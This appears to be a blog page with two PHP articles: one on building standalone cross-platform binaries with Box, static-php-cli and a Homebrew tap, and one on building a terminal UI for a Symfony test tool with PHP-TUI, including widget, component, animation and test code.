Edit (2026-03-26): added Distribution / Upgrade section.
TL;DR:
- Prepare the app for the prod environment: no dev deps, autoloading optimisation (classmap authoritative), compiling .env.local.php from .env, no-debug Symfony cache, etc.
- Compile the PHAR with Box
- Concatenate micro.sfx + dtk.phar into a self-contained binary with static-php-cli
I've been building DTK, a PHP CLI tool that automates the repetitive ceremony around the developer workflow: open ticket, create branch, open PR, merge, deploy - all wired together so you don't have to context-switch between your terminal, your Kanban board, and GitHub.
It's a Symfony Console app and it runs fine with php dtk,
but distributing it to teammates means they need PHP installed at the right version,
with the right extensions, plus Composer.
That's friction I'd rather not ask anyone to deal with.
Turns out, PHP can produce a single self-contained binary, no PHP required on the target machine. I learned this from a talk by Jean-François Lépine at Forum PHP 2025, PHP without PHP: Make Standalone Binaries from Your Code, which is in French, but here's an English recap of it.
Surprisingly easy to set up. Here's how.
Two tools do all the work.
Box packages a PHP project into a .phar archive.
A .phar is a self-contained PHP archive: it includes all your source files and vendor
dependencies, and PHP can execute it directly.
PHP Micro SFX, part of the static-php-cli (SPC) project,
is a minimal static PHP binary with no external dependencies.
It reads whatever binary data is appended to it and executes it as a .phar.
Combine the two:
micro.sfx + app.phar = standalone binary
One file. No PHP needed on the target machine. Drop it, run it.
Box reads a box.json config file and produces the archive.
Here's the one for DTK:
{
"$schema": "https://box-project.github.io/box/schema.json",
"main": "dtk",
"output": "build/dtk.phar",
"compression": "GZ",
"check-requirements": false,
"directories": [
"config",
"src",
"var/cache/prod",
"vendor"
],
"files": [
".env.local.php"
]
}
A few things worth noting:
- "main": "dtk" is the entry point PHP file that Box will call when the PHAR is executed
- "compression": "GZ" compresses the archive contents: smaller file, same behaviour
- "check-requirements": false skips the PHP version and extension check at runtime, since we know the bundled micro binary already has everything we need
- var/cache/prod includes the pre-warmed Symfony cache, so the binary doesn't need to write to the filesystem on first run
- .env.local.php is a compiled version of the environment variables

static-php-cli prebuilds micro SFX files for all major platforms and PHP versions, so you don't need to compile anything yourself.
In the DTK Dockerfile, I download them all at image build time:
RUN for PLATFORM in linux-x86_64 linux-aarch64 macos-x86_64 macos-aarch64; do \
curl -fsSL \
-o /tmp/micro.tar.gz \
"https://dl.static-php.dev/static-php-cli/common/php-${PHP_VERSION}-micro-${PLATFORM}.tar.gz" \
&& tar xzf /tmp/micro.tar.gz -C /usr/local/lib/ \
&& mv /usr/local/lib/micro.sfx "/usr/local/lib/micro-${PLATFORM}.sfx" \
&& rm /tmp/micro.tar.gz; \
done
Windows has a separate download (a zip, not a tarball), but same idea.
The micro SFX from static-php-cli includes a whole bunch of extensions,
so if you need some that are missing, or if you want the bare minimum, you'd need to compile
your own micro using SPC. That's more involved, but SPC has a doctor --auto-fix
command to help with the build environment setup.
With the PHAR built and the micro SFX files in place, combining them is a cat 😼:
cat micro-linux-x86_64.sfx dtk.phar > dtk-linux-x86_64
chmod +x dtk-linux-x86_64
That's it. The resulting file is a valid ELF binary (or Mach-O on macOS, PE on Windows) that carries its own PHP interpreter alongside the application code.
Here's the full build script I use for DTK (bin/mk-dtk-bin.sh) that does all of it:
#!/usr/bin/env bash
set -euo pipefail
# Restore dev dependencies once finished
trap 'composer install --optimize-autoloader --quiet' EXIT
echo ' // Installing prod dependencies...'
composer install --no-dev --classmap-authoritative --quiet
echo ' // Compiling environment variables...'
php bin/mk-dtk-bin/dump-env-prod.php
echo ' // Warming up Symfony cache...'
APP_ENV=prod APP_DEBUG=0 php bin/console cache:warmup --quiet
echo ' // Building PHAR...'
mkdir -p build
php -d phar.readonly=0 /usr/local/bin/box compile
echo ' // Assembling binaries...'
for _PLATFORM in linux-x86_64 linux-aarch64 macos-x86_64 macos-aarch64 windows-x86_64; do
case "${_PLATFORM}" in
windows-*) _EXT='.exe' ; _CHMOD=false ;;
*) _EXT='' ; _CHMOD=true ;;
esac
cat "/usr/local/lib/micro-${_PLATFORM}.sfx" build/dtk.phar > "build/dtk-${_PLATFORM}${_EXT}"
${_CHMOD} && chmod +x "build/dtk-${_PLATFORM}${_EXT}"
done
echo ' // Generating checksums...'
sha256sum \
build/dtk-linux-x86_64 \
build/dtk-linux-aarch64 \
build/dtk-macos-x86_64 \
build/dtk-macos-aarch64 \
build/dtk-windows-x86_64.exe \
> build/checksums.txt
echo ' [OK] Binaries built'
A few things the script does before building the PHAR:
- composer install --no-dev --classmap-authoritative: strips dev dependencies and generates a fast classmap-only autoloader: smaller archive, faster startup.
- dump-env-prod.php: compiles .env files into .env.local.php so the binary doesn't need to parse .env files at runtime. (Replicates what composer dump-env prod from symfony/flex does, without requiring symfony/flex as a dependency.)
- cache:warmup: pre-generates the Symfony container so the binary doesn't need write access to the filesystem on first run.
- The trap at the top restores dev dependencies when the script exits, so the local dev environment is left intact after a build.
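To make the dump-env step concrete, here is a self-contained, simplified sketch of what such a script does. The real bin/mk-dtk-bin/dump-env-prod.php presumably uses symfony/dotenv for full .env syntax support; the naive parser below is for illustration only.

```php
<?php
// Simplified sketch of a dump-env script: parse .env contents, force prod
// values, and emit the compiled .env.local.php source.

/** Parse simple KEY=VALUE lines (no quoting or interpolation, unlike real Dotenv). */
function parseDotenv(string $contents): array
{
    $vars = [];
    foreach (preg_split('/\R/', $contents) as $line) {
        $line = trim($line);
        if ('' === $line || str_starts_with($line, '#') || !str_contains($line, '=')) {
            continue;
        }
        [$key, $value] = explode('=', $line, 2);
        $vars[trim($key)] = trim($value);
    }

    return $vars;
}

$vars = parseDotenv("APP_ENV=dev\nAPP_SECRET=s3cret\n");
// Force prod values, as `composer dump-env prod` would.
$vars = array_merge($vars, ['APP_ENV' => 'prod', 'APP_DEBUG' => '0']);

// .env.local.php is just a PHP file returning the compiled array;
// at runtime a single require replaces all .env parsing.
$compiled = '<?php return '.var_export($vars, true).';'.PHP_EOL;
echo $compiled;
```

The payoff is that the binary never touches the filesystem looking for .env files: one opcache-friendly include and the environment is loaded.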
Running make app-bin in the Docker container produces:
build/dtk.phar
build/dtk-linux-x86_64
build/dtk-linux-aarch64
build/dtk-macos-x86_64
build/dtk-macos-aarch64
build/dtk-windows-x86_64.exe
build/checksums.txt
Five binaries, one per platform, from a single command, without leaving Docker. Each one runs without PHP on the target machine.
The binaries attach naturally to a GitHub release, alongside a checksums.txt
generated by sha256sum. Users can download the right binary for their platform
and verify the checksum.
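On the user side, verification is a single sha256sum invocation. A quick simulation of the flow (dtk-demo stands in for a real release asset):

```shell
# Simulate a downloaded release asset plus its checksums file.
printf 'fake binary' > dtk-demo
sha256sum dtk-demo > checksums.txt

# What a user runs after downloading: --ignore-missing skips checksum
# entries for the platforms they didn't download.
sha256sum --check --ignore-missing checksums.txt
```

With the real checksums.txt from the release, the same command confirms the binary arrived intact before it is moved onto the PATH.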
That could cover the first install, but what about upgrades?
Note: In the PHP world, the "obvious" idea could be a self-update command: check the GitHub Releases API for a newer version, download the matching binary, replace the current executable. Tools like php-cs-fixer do this. It works, but it means implementing platform detection and handling the running-binary-can't-overwrite-itself problem on Windows. A reasonable amount of work for a modest gain.
There's an easier way, and it's what most CLI tools already rely on: a package manager (e.g. Homebrew).
A Homebrew tap gets you the same result
with none of that complexity, and it's the mechanism users already know and trust for CLI tools (e.g. fd, eza, tmux, etc).
A tap is just a GitHub repository (named homebrew-<something>) with a Ruby formula
that points at the release assets:
class Dtk < Formula
desc "Kanban, Git and Deployment, in one coherent flow"
homepage "https://github.com/ssc-php/dtk"
license "MIT"
version "0.1.0"
on_macos do
on_intel do
url "https://github.com/ssc-php/dtk/releases/download/v#{version}/dtk-macos-x86_64"
sha256 "3e44b1c8583b9f5cc140acbc43726de81fb8a151c0afc43e1152729c9a06213b"
end
on_arm do
url "https://github.com/ssc-php/dtk/releases/download/v#{version}/dtk-macos-aarch64"
sha256 "957953df74861df6cb8f975c4864f4495277c63cdd8b73fa20f9884dd2538ca0"
end
end
on_linux do
on_intel do
url "https://github.com/ssc-php/dtk/releases/download/v#{version}/dtk-linux-x86_64"
sha256 "4870846397532db7e513b39cabfd3b6fba426fbb3232190480ffc2368a51da27"
end
on_arm do
url "https://github.com/ssc-php/dtk/releases/download/v#{version}/dtk-linux-aarch64"
sha256 "e4674f606d96fcbf2fe80505d26a4f260ef27f488b5d0e56e5193f54a9ebd263"
end
end
def install
bin.install Dir["dtk-*"].first => "dtk"
end
test do
assert_match version.to_s, shell_output("#{bin}/dtk --version")
end
end
Users install once:
brew tap ssc-php/dtk
brew install dtk
And upgrade the same way as any other tool:
brew upgrade dtk
The formula file lives in the tap repo. On each release, update the version field
and the sha256 hashes, commit, push. The release script does this automatically.
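The update step itself is small. Here is a hypothetical sketch of it (file names, sed patterns, and the single-asset scope are all illustrative; the real release script handles all five assets):

```shell
# Stand-ins so the sketch is self-contained: a one-asset formula excerpt
# and a fake release binary in place of a real build output.
cat > dtk.rb <<'RUBY'
  version "0.1.0"
  url "https://github.com/ssc-php/dtk/releases/download/v#{version}/dtk-linux-x86_64"
  sha256 "OLD"
RUBY
printf 'fake binary' > dtk-linux-x86_64

# 1. Bump the version field.
VERSION="0.2.0"
sed -i "s/version \"[^\"]*\"/version \"${VERSION}\"/" dtk.rb

# 2. Refresh the sha256 on the line that follows the matching url line.
SUM=$(sha256sum dtk-linux-x86_64 | cut -d' ' -f1)
sed -i "/dtk-linux-x86_64/{n;s/sha256 \".*\"/sha256 \"${SUM}\"/}" dtk.rb

cat dtk.rb
```

Loop that second step over the four platform assets, commit, push, and the tap is up to date.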
This is real PHP, the same interpreter, the same extensions, the same behaviour. A few things to be aware of:
FFI is not available. Foreign Function Interface calls (PHP calling C libraries directly) don't work in static builds. For a CLI tool this is unlikely to matter.
Binary size. A minimal PHP binary with no extensions is around 3 MB. DTK, which only uses standard extensions, comes out much smaller than a full PHP install. Not Go-binary small, but perfectly acceptable for a CLI tool distributed via GitHub Releases.
Startup time. There's a small overhead compared to running php dtk directly:
PHAR extraction adds a few milliseconds, and the static build uses musl libc rather
than glibc, which is slightly slower.
For a developer tool where the user is waiting hundreds of milliseconds anyway, this doesn't matter.
Not for web apps. This is for CLI / TUI / scripts; for web PHP apps, use FrankenPHP instead. It's a production-proven PHP app server built on top of static-php-cli that handles all the complexity, and it ships as a standalone binary too.
The whole thing (Box config, Dockerfile setup, build script) took an afternoon.
Most of that time was reading the static-php-cli docs and figuring out the Docker layering.
The actual concatenation step (cat micro.sfx app.phar > binary) was the part that surprised me most:
something that powerful should not be that simple :D !
If you're building a PHP CLI tool meant to be distributed to people who shouldn't need to care about PHP, this is the approach. It works, it's well-supported (FrankenPHP, Laravel Herd, and NativePHP all use static-php-cli under the hood), and the tooling is solid.
If you want to see a real-world example of a PHP project that compiles its own micro binaries (including the SPC setup), look at Castor. Castor is a task runner / script launcher for PHP (think Make or Taskfile, but in PHP) and it ships prebuilt binaries for all platforms. Its build setup is a good reference for when you outgrow the prebuilt micro SFX files and need to compile your own with a custom extension set.
The full DTK source used in this article is available at github.com/ssc-php/dtk/tree/v0.1.0. The Homebrew tap code added in the edit is in commit 129e26a. The Homebrew tap itself is at github.com/ssc-php/homebrew-dtk/commit/daa6aa1.
In the previous article, we built Qalin: BisouLand's Test Control Interface, a dedicated Symfony app that lets anyone on the team reach any game state on demand, without touching production code.
Qalin already has three interfaces: CLI, API, and a Web UI.
After using it for a bit, I realised to my utter dismay that I somehow preferred using the Web UI, not the CLI one as I'd have expected 🙀. I live in the terminal; using a Web UI or GUI is unacceptable, so let's fix that by...
Introducing a TUI (Terminal User Interface). In today's article, we'll build one with PHP-TUI.

Did you notice the animated banner when switching to new screen or submitting the forms? Nice!
PHP-TUI is a PHP port of Ratatui, the popular Rust TUI library.
It gives you a retained-mode widget system, a layout engine based on constraints, and a terminal backend: all the building blocks to draw full-screen interactive applications directly in your terminal.
The core loop is straightforward: read the pending input events, update state, redraw, sleep, repeat.
No browser, no HTTP server, no JavaScript framework. Just your terminal, a render loop, and widgets.
PHP-TUI is powerful precisely because it stays out of your way: it doesn't come with any opinionated defaults or conventions about how to structure an application. It gives you widgets, a layout engine, and a terminal backend, and leaves everything else to you.
But that means it can be quite daunting to build your own application with it, especially since there are (at the time of writing) not a lot of resources about it.
Most of what follows (the Screen interface, the Action navigation model,
the Component abstraction, the Form system, the custom widgets) is my own design,
loosely inspired by my partial understanding of how Ratatui applications are structured.
Take them as one possible approach, not as the official way to use PHP-TUI.
Let's walk through it.
QalinTui is the entry point. It sets up the terminal, registers widget renderers,
and runs the event/render loop:
public function run(): void
{
$terminal = Terminal::new();
$backend = PhpTermBackend::new($terminal);
$display = DisplayBuilder::default($backend)
->addWidgetRenderer(new LayoutWidgetRenderer())
->addWidgetRenderer(new BannerWidgetRenderer())
->addWidgetRenderer(new FormWidgetRenderer())
->addWidgetRenderer(new KeyHintsWidgetRenderer())
// ... more custom renderers
->fullscreen()
->build()
;
try {
$terminal->execute(Actions::cursorHide());
$terminal->execute(Actions::alternateScreenEnable());
$terminal->enableRawMode();
while (true) {
// Drain all queued events before redrawing
while ($event = $terminal->events()->next()) {
$action = $this->handle($event);
if ($action instanceof Quit) {
return;
}
}
$display->draw($this->activeScreen->build());
usleep(50_000); // 50 ms
}
} finally {
$terminal->disableRawMode();
$terminal->execute(Actions::alternateScreenDisable());
$terminal->execute(Actions::cursorShow());
}
}
Three terminal setup calls worth knowing:
- alternateScreenEnable() switches to a blank buffer, so closing the TUI restores the terminal exactly as it was before
- enableRawMode() disables the default echo and buffering behaviours, so keypresses go directly to the application instead of being processed by the shell
- cursorHide() removes the blinking cursor from the TUI surface

The finally block ensures all three are reversed on exit, whether the app quits normally or throws.
The inner loop drains all queued events before each redraw. This avoids redundant renders when multiple events arrive within the same 50 ms window.
🐘 PHP-TUI:
DisplayBuilder::default() is the entry point for constructing a display. addWidgetRenderer() registers custom renderers alongside the built-in ones. fullscreen() sizes the surface to the terminal dimensions. build() returns the display ready for use.
The application is structured around screens.
Each screen is a full-page view with three responsibilities:
interface Screen
{
// Unique display name (shown in menus, titles, etc.)
public function name(): string;
// Renders current state as a Widget tree for this frame
public function build(): Widget;
// Processes an input event and signals what should happen next
public function handle(Event $event): Action;
}
handle() returns one of three Action types:
- Stay: the event was handled internally, stay on this screen
- Navigate(ScreenClass::class): transition to another screen
- Quit: exit the TUI

QalinTui owns all registered screens and a pointer to the active one.
When handle() returns Navigate, it updates the active screen pointer and returns
Stay to the loop:
public function handle(Event $event): Action
{
$action = $this->activeScreen->handle($event);
if ($action instanceof Navigate) {
$this->activeScreen = $this->screens[$action->screen] ?? $this->activeScreen;
return new Stay();
}
return $action;
}
Screens are registered via Symfony's #[AutowireIterator] by DI tag, so adding a new
screen is a matter of implementing Screen and tagging it, no wiring by hand.
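A hedged sketch of what that wiring can look like (Symfony's #[AutowireIterator] attribute is real; the tag name qalin.screen and the default-screen choice are my inventions):

```php
<?php
// Hypothetical wiring sketch: QalinTui receives every service tagged as a
// screen. The tag name 'qalin.screen' is illustrative.
use Symfony\Component\DependencyInjection\Attribute\AutowireIterator;

final class QalinTui
{
    /** @var array<class-string, Screen> */
    private array $screens = [];
    private Screen $activeScreen;

    public function __construct(
        #[AutowireIterator('qalin.screen')] iterable $screens,
    ) {
        foreach ($screens as $screen) {
            $this->screens[$screen::class] = $screen;
        }
        // Assuming HomeScreen is the initial screen.
        $this->activeScreen = $this->screens[HomeScreen::class];
    }
}
```

Implement Screen, tag the service, and it shows up in the navigation map without touching QalinTui.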
HomeScreen is the entry point. It shows a tab-split choice input
of available actions and scenarios.

The choice input combines a fuzzy-find filter and a navigable list in a single component,
ChoiceFieldComponent. The screen passes it the screen names for the active tab and
delegates all filtering and navigation to it.
build() is straightforward:
public function build(): Widget
{
return LayoutWidget::from(
$this->qalinAnimatedBanner->widget(),
$this->tabs->build(), // hotkey tab bar: "1 Actions / 2 Scenarios"
$this->choiceInput->build(), // fuzzy-find filter + navigable list
KeyHintsWidget::from(['Next' => 'Tab', 'Select' => 'Enter', 'Quit' => 'Esc']),
);
}
ChoiceFieldComponent::build() returns a single widget that renders both the filter
input and the list, so the screen body is just $this->choiceInput->build(): no
manual GridWidget, no ListWidget, no cursor tracking.
The handle() method uses PHP's match to dispatch on event type and key code:
public function handle(Event $event): Action
{
return match (true) {
$event instanceof CodedKeyEvent => match ($event->code) {
KeyCode::Esc => new Quit(),
KeyCode::Tab, KeyCode::Down => $this->handleChoiceInput(CodedKeyEvent::new(KeyCode::Down)),
KeyCode::BackTab, KeyCode::Up => $this->handleChoiceInput(CodedKeyEvent::new(KeyCode::Up)),
KeyCode::Enter => $this->selectCurrentScreen(),
default => $this->handleChoiceInput($event),
},
$event instanceof CharKeyEvent => match ($this->tabs->handle($event)) {
ComponentState::Changed => $this->resetChoiceInput(),
ComponentState::Handled => new Stay(),
ComponentState::Ignored, ComponentState::Submitted => $this->handleChoiceInput($event),
},
default => new Stay(),
};
}
Tab hotkeys (1 for Actions, 2 for Scenarios) are tried first for every character
event. If the character is not a hotkey, it is forwarded to ChoiceFieldComponent,
which appends it to the filter. Switching tabs resets the choice input for the new tab's
screen list.
Each Qalin action has its own screen. They all follow the same pattern: a form on the left, the API response on the right.

Here is UpgradeInstantlyForFreeScreen:
public function __construct(
private readonly HttpClientInterface $qalinHttpClient,
private readonly QalinAnimatedBanner $qalinAnimatedBanner,
) {
$this->form = FormComponent::fromFields(
InputFieldComponent::fromLabel('Username'),
ChoiceFieldComponent::fromLabelAndChoices('Upgradable', array_map(
static fn (Upgradable $u): string => $u->value,
Upgradable::cases(),
)),
InputFieldComponent::fromLabel('Levels')->withValue('1'),
SubmitFieldComponent::fromLabel('Upgrade'),
);
}
public function build(): Widget
{
return LayoutWidget::from(
$this->qalinAnimatedBanner->widget(),
ConstrainedWidget::wrap(
ParagraphWidget::fromLines(Line::fromSpans(
Span::styled('Action: UpgradeInstantlyForFree', Style::default()
->fg(AnsiColor::Yellow)
->addModifier(Modifier::BOLD)),
)),
Constraint::length(3),
),
GridWidget::default()
->direction(Direction::Horizontal)
->constraints(
Constraint::percentage(50),
Constraint::percentage(50),
)
->widgets(
$this->form->build(),
BlockWidget::default()
->borders(Borders::ALL)
->borderType(BorderType::Rounded)
->titles(Title::fromString('Result'))
->widget(KeyValueWidget::fromRows($this->result ?? [])),
),
KeyHintsWidget::from(['Next' => 'Tab', 'Submit' => 'Enter', 'Back' => 'Esc']),
);
}
public function handle(Event $event): Action
{
if ($event instanceof CodedKeyEvent && KeyCode::Esc === $event->code) {
$this->qalinAnimatedBanner->animate();
return new Navigate(HomeScreen::class);
}
if (ComponentState::Submitted !== $this->form->handle($event)) {
return new Stay();
}
$this->qalinAnimatedBanner->animate();
$response = $this->qalinHttpClient->request('POST', 'api/v1/actions/upgrade-instantly-for-free', [
'json' => [
'username' => $this->form->getValues()['Username'],
'upgradable' => $this->form->getValues()['Upgradable'],
'levels' => (int) $this->form->getValues()['Levels'],
],
]);
$this->result = $response->toArray(false);
return new Stay();
}
The FormComponent manages tab-cycling between fields and signals ComponentState::Submitted
when the submit button is pressed. The screen delegates all form events to it and only
reacts to the Submitted state: it does not need to know which field is focused or
how the cursor moves.
PHP-TUI ships a set of built-in widgets (Paragraph, Grid, Block, List, etc.). For anything that needs different composition or reuse, you create a custom widget.
A custom widget is two classes: an immutable data class implementing Widget (what to draw), and a renderer implementing WidgetRenderer (how to draw it).
HotkeyTabsWidget renders a tab bar like [1] Actions | [2] Scenarios.
The data class holds the tabs map, the focused hotkey, and three style properties:
final readonly class HotkeyTabsWidget implements Widget, Constrained
{
/** @param non-empty-array<array-key, string> $hotkeyTabs hotkey => label */
private function __construct(
public array $hotkeyTabs,
public string $focusedHotkey,
public Style $hotkeyStyle,
public Style $focusedLabelStyle,
public Style $unfocusedLabelsStyle,
) {
}
/** @param array<array-key, string> $tabs hotkey => label */
public static function fromTabs(array $tabs): self
{
if ([] === $tabs) {
throw ValidationFailedException::make(
'Invalid "HotkeyTabsWidget" parameter: tabs should not be empty (`[]` given)',
);
}
foreach (array_keys($tabs) as $hotkey) {
if (1 !== mb_strlen((string) $hotkey)) {
throw ValidationFailedException::make(
"Invalid \"HotkeyTabsWidget\" parameter: tab hotkey should be a single character (`{$hotkey}` given)",
);
}
}
return new self(
$tabs,
(string) array_key_first($tabs),
Style::default()->fg(AnsiColor::Blue)->addModifier(Modifier::BOLD),
Style::default()->fg(AnsiColor::Yellow)->addModifier(Modifier::BOLD),
Style::default()->fg(AnsiColor::DarkGray),
);
}
public function focus(string $hotkey): self
{
if (!\array_key_exists($hotkey, $this->hotkeyTabs)) {
throw ValidationFailedException::make(
"Invalid \"HotkeyTabsWidget\" parameter: focusedHotkey should match an existing tab hotkey (`{$hotkey}` given)",
);
}
return new self(
$this->hotkeyTabs,
$hotkey,
$this->hotkeyStyle,
$this->focusedLabelStyle,
$this->unfocusedLabelsStyle,
);
}
public function constraint(): LengthConstraint
{
return Constraint::length(3);
}
// hotkeyStyle(), focusedLabelStyle(), unfocusedLabelsStyle() withers omitted for brevity
}
The widget is immutable: focus() returns a new instance rather than mutating state.
constraint() is part of the Constrained interface, which lets the layout system
ask the widget how much space it needs (3 rows: 1 content + 2 border).
The renderer builds the [1] Actions | [2] Scenarios line from Span elements,
applying the focused or unfocused label style depending on which hotkey is active:
final class HotkeyTabsWidgetRenderer implements WidgetRenderer
{
public function render(
WidgetRenderer $renderer,
Widget $widget,
Buffer $buffer,
Area $area,
): void {
if (!$widget instanceof HotkeyTabsWidget) {
return;
}
$spans = [];
$isFirstTab = true;
foreach ($widget->hotkeyTabs as $key => $label) {
$hotkey = (string) $key;
$label = (string) $label;
if (!$isFirstTab) {
$spans[] = Span::styled(' | ', $widget->unfocusedLabelsStyle);
}
$isFirstTab = false;
$spans[] = Span::styled('[', $widget->unfocusedLabelsStyle);
$spans[] = Span::styled($hotkey, $widget->hotkeyStyle);
$spans[] = Span::styled('' !== $label ? '] ' : ']', $widget->unfocusedLabelsStyle);
$spans[] = Span::styled(
$label,
$hotkey === $widget->focusedHotkey
? $widget->focusedLabelStyle
: $widget->unfocusedLabelsStyle,
);
}
$renderer->render(
$renderer,
ParagraphWidget::fromLines(Line::fromSpans(...$spans)),
$buffer,
$area,
);
}
}
The renderer receives the Area (width and height of the allocated space) and the
Buffer (the mutable character grid for this frame). It does not write to the buffer
directly: it delegates to a built-in widget via $renderer->render().
That is the common pattern: assemble standard widgets from the widget's data, then
pass rendering back to the framework.
🐘 PHP-TUI: register custom renderers with
DisplayBuilder::addWidgetRenderer(). Renderers are checked in order; the first one that recognises the widget class wins. The WidgetRenderer $renderer parameter passed to render() is the full chain, so delegating to built-in widgets is just $renderer->render($renderer, $childWidget, $buffer, $area).
A component wraps a widget with mutable state and event handling. Where a widget is pure data built fresh each frame, a component lives across frames and tracks what has changed.
HotkeyTabsComponent wraps HotkeyTabsWidget and adds focus state and event handling.
It is generic over HotkeyTab, an interface with two methods:
interface HotkeyTab
{
public function key(): string; // single character, e.g. '1'
public function label(): string; // display name, e.g. 'Actions'
}
Any backed enum implementing HotkeyTab can be used as a tab set.
HomeTab is the one used by HomeScreen:
enum HomeTab: string implements HotkeyTab
{
case Actions = 'Actions';
case Scenarios = 'Scenarios';
public function key(): string
{
return match ($this) {
self::Actions => '1',
self::Scenarios => '2',
};
}
public function label(): string { return $this->value; }
}
The component itself:
/** @template TTab of HotkeyTab */
final class HotkeyTabsComponent implements Component
{
private int $focusedIndex = 0;
/** @param non-empty-list<TTab> $tabs */
private function __construct(private readonly array $tabs) {}
/** @return self<TTab> */
public static function fromTabs(array $tabs): self
{
return new self($tabs);
}
public function handle(Event $event): ComponentState
{
if (!$event instanceof CharKeyEvent) {
return ComponentState::Ignored;
}
foreach ($this->tabs as $index => $tab) {
if ($event->char === $tab->key()) {
if ($index === $this->focusedIndex) {
return ComponentState::Handled;
}
$this->focusedIndex = $index;
return ComponentState::Changed;
}
}
return ComponentState::Ignored;
}
public function build(): HotkeyTabsWidget
{
$tabs = [];
foreach ($this->tabs as $tab) {
$tabs[$tab->key()] = $tab->label();
}
return HotkeyTabsWidget::fromTabs($tabs)
->focus($this->tabs[$this->focusedIndex]->key());
}
/** @return TTab */
public function isFocused(): mixed
{
return $this->tabs[$this->focusedIndex];
}
}
handle() returns ComponentState::Changed when the focused tab changes, Handled
when the same tab's hotkey is pressed again, and Ignored for anything else.
The screen uses that distinction to decide whether to reset dependent state (e.g. the
choice input) or simply stay put.
build() snapshots the current focus into a fresh HotkeyTabsWidget each frame.
The widget has no memory of previous frames; the component does.
The Qalin banner is animated. When the user navigates between screens, it plays a short animation: either a Beat (the logo contracts and shifts to magenta) or Sparkles (sparkle characters appear on the logo).
Both implement the same Animation interface:
interface Animation
{
public function animate(): void;
public function logo(): array;
public function logoStyle(): Style;
}
Beat is time-based. It stores the moment animate() was called, then
isBeating() derives the current state from elapsed time:
final class Beat implements Animation
{
private const BEAT_ON_SECONDS = 0.15;
private const BEAT_OFF_SECONDS = 0.1;
private const BEAT_COUNT = 2;
private ?float $beatStartedAt = null;
// Clock injected for testability, cf. `new Beat($mockClock)` in the tests below.
public function __construct(private readonly ClockInterface $clock) {}
public function animate(): void
{
$this->beatStartedAt = $this->now();
}
public function logo(): array
{
return $this->isBeating() ? self::CONTRACTED_LOGO : QalinBanner::LOGO;
}
public function logoStyle(): Style
{
return $this->isBeating()
? Style::default()->fg(AnsiColor::Magenta)
: Style::default()->fg(AnsiColor::Red);
}
private function isBeating(): bool
{
if (null === $this->beatStartedAt) {
return false;
}
$elapsed = $this->now() - $this->beatStartedAt;
$cycleSeconds = self::BEAT_ON_SECONDS + self::BEAT_OFF_SECONDS;
$totalSeconds = self::BEAT_COUNT * $cycleSeconds;
if ($elapsed >= $totalSeconds) {
$this->beatStartedAt = null;
return false;
}
return fmod($elapsed, $cycleSeconds) < self::BEAT_ON_SECONDS;
}
private function now(): float
{
return (float) $this->clock->now()->format('U.u');
}
}
The animation has no state machine, no scheduler, no timer callback.
logo() and logoStyle() are called every frame (every 50 ms);
they read the clock, compute where we are in the animation, and return the right data.
When the animation is over, beatStartedAt is reset to null.
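With those constants the timeline is fixed: a cycle lasts 0.25 s (0.15 s on + 0.10 s off) and the whole animation 0.5 s. The same arithmetic, extracted as a pure function for illustration:

```php
<?php
// Beat's timing arithmetic as a pure function (constants copied from the class).
function isBeatingAt(float $elapsed): bool
{
    $on = 0.15;
    $off = 0.10;
    $cycle = $on + $off;    // 0.25 s per beat
    $total = 2 * $cycle;    // BEAT_COUNT = 2 -> 0.5 s overall

    if ($elapsed >= $total) {
        return false;       // animation finished
    }

    return fmod($elapsed, $cycle) < $on;
}

var_dump(isBeatingAt(0.05)); // first beat: contracted magenta logo
var_dump(isBeatingAt(0.20)); // between beats: normal red logo
var_dump(isBeatingAt(0.30)); // second beat: contracted again
var_dump(isBeatingAt(0.60)); // past 0.5 s: animation over
```

Because the function is pure over elapsed time, any frame rate works: the 50 ms render loop just samples it wherever it happens to land.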
QalinAnimatedBanner wraps the animations and exposes a single widget() method
for screens to use:
final class QalinAnimatedBanner
{
public function animate(): void
{
$this->currentAnimation = $this->pickRandomAnimation();
$this->currentAnimation->animate();
}
public function widget(): BannerWidget
{
$logo = $this->currentAnimation?->logo() ?? QalinBanner::LOGO;
$logoStyle = $this->currentAnimation?->logoStyle() ?? Style::default()->fg(AnsiColor::Red);
return QalinBanner::widgetWithLogo($logo, $logoStyle);
}
}
Screens call $this->qalinAnimatedBanner->animate() on navigation events (entering and
leaving a screen), then let widget() return whatever frame the animation is currently on.
🎶 Symfony Clock:
ClockInterface from symfony/clock lets the animation read the current time without coupling to time() or microtime(). In tests, swap in a MockClock and control time explicitly. For a feature as simple as a cosmetic animation the test value is low, but the approach scales cleanly to anything time-sensitive.
Testing a TUI application might sound tricky, but the architecture makes it straightforward. There are three levels.
Widgets and components are plain PHP classes with no terminal dependency. Testing them is just instantiating, calling methods, and asserting state.
HotkeyTabsWidgetTest covers construction, validation, focus switching, and styles:
/** @param array<array-key, string> $tabs */
#[DataProvider('tabsProvider')]
#[TestDox('It has hotkeyTabs: $scenario')]
public function test_it_has_hotkey_tabs(string $scenario, array $tabs): void
{
$tabsWidget = HotkeyTabsWidget::fromTabs($tabs);
$this->assertSame($tabs, $tabsWidget->hotkeyTabs);
}
public static function tabsProvider(): \Generator
{
yield [
'scenario' => "one as `['1' => 'TabA']` (`[hotkey => label]`)",
'tabs' => ['1' => 'TabA'],
];
yield [
'scenario' => "many as `['1' => 'TabA', '2' => 'TabB', '3' => 'TabC']` (`[hotkey => label]`)",
'tabs' => ['1' => 'TabA', '2' => 'TabB', '3' => 'TabC'],
];
}
/** @param array<array-key, string> $tabs */
#[DataProvider('invalidTabsProvider')]
#[TestDox('It fails when $scenario')]
public function test_it_fails_with_invalid_tabs(string $scenario, array $tabs): void
{
$this->expectException(ValidationFailedException::class);
HotkeyTabsWidget::fromTabs($tabs);
}
public static function invalidTabsProvider(): \Generator
{
yield [
'scenario' => 'hotkeyTabs is empty (`[]` given)',
'tabs' => [],
];
yield [
'scenario' => "hotkey is more than one character (`['ab' => 'TabA']` given)",
'tabs' => ['ab' => 'TabA'],
];
}
make phpunit arg='--testdox --order-by=default --filter HotkeyTabsWidgetTest'
Hotkey Tabs Widget (Bl\Qa\Tests\Qalin\Spec\Infrastructure\PhpTui\Component\HotkeyTab\HotkeyTabsWidget)
✔ It has hotkeyTabs: one as `['1' => 'TabA']` (`[hotkey => label]`)
✔ It has hotkeyTabs: many as `['1' => 'TabA', '2' => 'TabB', '3' => 'TabC']` (`[hotkey => label]`)
✔ It has hotkeyTabs: with empty label (e.g. `['1' => '']`)
✔ It has constraint (e.g. Constraint::length(3): 1 content row + 2 border rows)
✔ It fails when hotkeyTabs is empty (`[]` given)
✔ It fails when hotkey is missing (`['TabA']` given)
